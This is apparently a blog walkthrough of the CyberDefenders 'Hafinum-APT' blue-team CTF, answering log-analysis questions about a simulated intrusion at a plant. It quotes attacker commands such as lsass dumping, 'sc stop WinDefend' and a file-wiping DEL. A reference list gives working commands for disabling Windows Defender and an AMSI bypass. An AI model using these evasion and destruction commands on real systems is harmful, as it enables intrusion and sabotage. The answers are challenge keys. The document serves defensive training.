Open in app

Sign in

Write

Sign in

BlueYard 103 — Hafinum-APT

Patrick Young
10 min readMay 21, 2023

--

URL: https://cyberdefenders.org/blueteam-ctf-challenges/103#nav-questions

Scenario

You work as a SOC analyst for a consulting firm that specializes in digital forensics and incident response. You are assigned to investigate a security incident that occurred at a manufacturing plant that produces electronic components. The plant uses a variety of industrial control systems (ICS) to manage their production lines and other critical operations.

The security team at the plant detected suspicious network activity from an external IP address associated with the Hafnium threat actor group.

Your task is to investigate the incident and determine the extent of the compromise, the attacker’s objectives, and the potential impact on the plant’s operations. You have been provided with log files from the plant’s servers and workstations, which include Windows event logs and TeamViewer logs. You must analyze the logs and gathering information about the attacker’s activity.

Q&A

  • What is the name of the threat detected by Windows Defender?

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide

winlog.provider_name : "Microsoft-Windows-Windows Defender" and winlog.event_data.Threat Name : *

  • What was the full URL that Windows Defender blocked an archive from being downloaded?

Same as previous question, answer is: https://download.sysinternals.com/files/Procdump.zip

  • What was the full command used by the attacker to successfully download the archive?

The possible download method includes: PoSH and etc. It seems that this hacker loves certutil.exe, but this is blocked previously, which worth a deeply investigation.

https://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/

After a bit digging, I cannot find anything interesting in Both “Powershell” and “Microsoft-Windows-Powershell”, so I turned to Sysmon, Use: winlog.provider_name :"Microsoft-Windows-Sysmon" and winlog.event_id: "1" and winlog.event_data.OriginalFileName: "CertUtil.exe", I found the downloader command line is:

  • Which user account was the attacker using when the archive was successfully downloaded to the host?

Same as previous question, another field named winlog.event_data.User records this as: "Administrator".

  • What command was used by the attacker on the host to try and disable Windows Defender via the command line?

Two common methods to disable: MpCmdRun or PoSH or SC. Since I didn’t notice any anomalies before, here must be MpCmdRun or SC, then Sysmon again.

MpCmdRun does not reveal any illegal activities, use: winlog.provider_name :"Microsoft-Windows-Sysmon" and winlog.event_id: "1" and winlog.event_data.OriginalFileName: "sc.exe" found. The answer is: sc stop WinDefend.

  • Provide the date and time when Windows Defender’s real-time protection was disabled. (24H-UTC)

Here, you should be careful, the time is for “Disable Real-Time Protection” instead of “Disable Windows Defender”

So let’s go back to Defender Event Log.

winlog.provider_name: "Microsoft-Windows-Windows Defender" and winlog.event_id: "5001"

The answer is: 2021-03-12 08:21:35, the time shown in GUI is your local time, so make sure convert back to UTC, for Beijing Time, you should -8h.

  • Which version of ProcDump did the attacker run on the host?

Query: winlog.provider_name :"Microsoft-Windows-Sysmon" and winlog.event_id: "1" and winlog.event_data.OriginalFileName: "procdump"

So the answer is: Version: “10.0” in field winlog.event_data.FileVersion

  • Where is the executable located on the disk that was targeted by Procdump to dump its process memory?

Since the disk partition is assigned to drive letter C, and we know the target process is lsass.exe

So the answer is: C:\Windows\system32\lsass.exe

  • What was the location of the dump file created from the process dumped with Procdump?

Same as previous, check working directory of procdump.exe.

So the answer is: C:\tmp\lsass.dmp

  • Provide the SHA256 hash value of the Teamviewer installation to check if the legitimate version was installed.

Well, that does not correctly reveal the targeted image of examiner, it actually request the SHA256 hash of teamviewer_service.exe

Comment after finished: Filtering for file created sysmon event (ID 11) with “install” keyword might work. You will find an event TargetFilename is InstallOptions.dll and also an event whose CommandLine is TeamViewer_Service.exe -install and its ParentCommandLine is C:\Users\MrPoop\AppData\Local\Temp\2\TeamViewer\TeamViewer_.exe, that’s a little bit weird.

Query: winlog.provider_name :"Microsoft-Windows-Sysmon" and winlog.event_id: "1" and winlog.event_data.OriginalFileName: "TeamViewer_Service.exe"

BTW, Thanks to auto-completion of kibana:

  • What was the domain looked up in the first DNS query done by the TeamViewer application after it was installed?

Sysmon Event ID 22 is for DNSQuery. TeamViewer begins its first request via its service process.

Query: winlog.provider_name :"Microsoft-Windows-Sysmon" and winlog.event_id: "22" and winlog.event_data.Image: "C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe"

Answer is: router7.teamviewer.com

  • Determine how the attacker gained access to the Administrator account.

Basically the most common technique is brute-force attack, but I don’t know why, after examine the 4625 events, I choose to answer Brute-Force Attack, it works.

Query: winlog.channel: "Security" and winlog.event_id: "4625"

  • What IP address can we send to the Firewall team for blocking?

Same as previous question, Query: winlog.channel: "Security" and winlog.event_id: "4625", answer: 8.36.216.58

  • What was the hostname from where the attacker launched their attack?

Same as previous question. Answer: FancyPoodle

  • Provide the first timestamp from the logs where you can see the attacker was successful login. (24H-UTC)

Here, use IP address as filter to make sure there is the only source, instead of computer name.

Query: winlog.channel: "Security" and winlog.event_id: "4624" and winlog.event_data.IpAddress : "8.36.216.58"

Answer: 2021-03-11 20:26:52

  • Provide the data in UTC time of when the attacker successfully logged into the host using RDP for the first time. (24H-UTC)

Query: winlog.channel: "Security" and winlog.event_id: "4624" and winlog.event_data.IpAddress : "8.36.216.58" and winlog.event_data.LogonType: "10"

Answer: 2021-03-12 08:03:00

Here, we could examine the Logon ID from field winlog.event_data.TargetLogonId : 0xcc535a

This will be used in next question.

  • When did the attacker log off from the first RDP session? (24H-UTC)

Weird Question, this should be linked to attacker session, which means you must connect this with attacker, since the successful logon occurred in 03/12/2021 08:03:00 as administrator, so this should be later than logon. Also, the question strictly restricted to: “RDP Session Logoff”, you should not use 4634.

Query: winlog.provider_name : "Microsoft-Windows-TerminalServices-LocalSessionManager" and winlog.event_id: "23"

Answer: 2021-03-12 08:45:02

  • What command did the attacker run on the host which would’ve helped him understand what Antivirus software was running on the system?

I’ve already mentioned several times above that there’s no illegal activity occurred in powershell event logging, so this time we would like to check the sysmon log again, especially for newly created process. The command run by attacker must be interpreted by something, so it should be enough to check all subprocesses of cmd.exe

Query: winlog.provider_name: "Microsoft-Windows-Sysmon" and winlog.event_id: "1" and winlog.event_data.ParentImage: "C:\Windows\System32\cmd.exe"

Answer: tasklist

  • Which command did the attacker run on the host that would have helped him understand the network interface configuration of the host?

Same as previous question.

Answer: ipconfig /all

  • What was the name of the user account added by the attacker?

Same as previous question. Answer: administrator1

  • Q21: Based on information from the public, the first visual signs of raw sewage spilling into the river from the plant were around 14:00 local time on March 12th, 2021. According to the plant technicians, it would take at least 45 minutes for the plant to excrete sewage into the river once the backwash mode was activated. A file was created on the system that matches the above timelines and, based on its content, could likely have been used by the attackers to initiate the plant backwash. What was the name of this file?
  • Q22: Which application was responsible for downloading the malicious file to the host?
  • Q24: After this file was downloaded, the attacker appeared to have moved it to another directory on the host. What was the new path of the file?

From previous questions, we’ve already noticed a file C:\Program Files\ifak\SIMBA#4.3\simba.exe

We would also notice the process repeatedly trying to kill simba here:

So, shorten the time period and search for file creation:

We would also notice this file is downloaded by Chrome.

So our answer is: backwash.bat and chrome.exe

  • Q23: From which website was this malicious file downloaded?

Search for DNS request from chrome.exe or Network connection from chrome.exe, However, none of them will provide you a strong clue to downloaded file. Even though, you could still get answer from Sysmon event 22 (DNS Resolution) and corresponding time range. The Sysmon event 3 (network connection) have nothing related to chrome.exe. But the correct answer is Sysmon event 15.

Event ID 15: FileCreateStreamHash

This event logs when a named file stream is created, and it generates events that log the hash of the contents of the file to which the stream is assigned (the unnamed stream), as well as the contents of the named stream. There are malware variants that drop their executables or configuration settings via browser downloads, and this event is aimed at capturing that based on the browser attaching a Zone.Identifier “mark of the web” stream.

Query used for Sysmon event 15: winlog.provider_name: "Microsoft-Windows-Sysmon" and winlog.event_id: "15"

Query used for Sysmon event 22: winlog.provider_name: "Microsoft-Windows-Sysmon" and winlog.event_id: "22"

Both linked to answer: wetransfer.com

  • Based on the available logs, there are limited indications that the downloaded malicious file was executed on the host. Provide the earliest timestamp which shows proof of the file being executed on the host. (24H-UTC)

We’ve already know the content of downloaded file and its final path, so let’s check newly created process again.

Query: winlog.provider_name: "Microsoft-Windows-Sysmon" and winlog.event_id: "1", Time range is from 03/12/2021 19:00 to 03/12/2021 19:33

Answer: 2021–03–12 11:10:03

  • What command contained in the malicious file, if successfully run on the host, would you expect to have initiated the plant’s backwash mode.

Query: winlog.provider_name: "Microsoft-Windows-Sysmon" and winlog.event_id: "15"

Answer: C:\Program Files\ifak\SIMBA#4.3\Simba.exe --function backwash --interruptable no

Same as previous question, we could see the downloaded file contents, so analyzing it will give us answer.

  • Prior to switching to a manual override, the technicians attempted to open the modified Simba plant simulation software application in order to stop the backwash sequence. However, they could not get the application to launch. What command from the attacker’s script would have rendered the application unusable?

Same as previous question, analyze the downloaded malicious file contents.

Answer: DEL /F /Q "C:\Program Files\ifak\SIMBA#4.3\*"

Well done!

Reference

Confirm Local Machine Timezone

If you do not use pre-configured ELK for investigation, you might need to confirm the timezone of the machine that system event was created on.

After a little bit digging, it seems that windows event log “System” channel with event ID 6013, will give you the answer.

Query: winlog.event_id: "6013"

Disable Windows Defender (or something equal to that)

  • C:\Program Files\Windows Defender\MpCmdRun.exe -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $true
  • Add-MpPreference -ExeclusionPath "C:/"
  • [Ref].Assembly.GetType('System.Management.Automation.Amsiutils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
  • Uninstall-WindowsFeature Windows-Defender
  • Set-MpPreference -DisableRealtimeMonitoring $true -DisableAutoExclusions $true -DisablePrivacyMode $true -DisableBehaviorMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -DisableArchiveScanning $true -DisableCatchupFullScan $true -DisableCatchupQuickScan $true -DisableEmailScanning $true -DisableRemovableDriveScanning $true -DisableRestorePoint $true -DisableScannedMappedNetworkDrivesForFullScan $true -DisableScanningNetworkFiles $true -DisableBlockAtFirstSeen $true
  • sc stop WinDefend

Sysmon Two-Whitespaces Issue

Sysmon Event ID list

List of Sysmon Event IDs for Threat Hunting

Edit description

systemweakness.com

Others Writeup

CyberDefenders: Hafinum-APT

This writeup is for the CyberDefenders: Hafinum-APT challenge, focusing on Network Forensics, malware and using…

forensicskween.com

--

--

Patrick Young
Patrick Young

Written by Patrick Young

2 Followers
5 Following

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams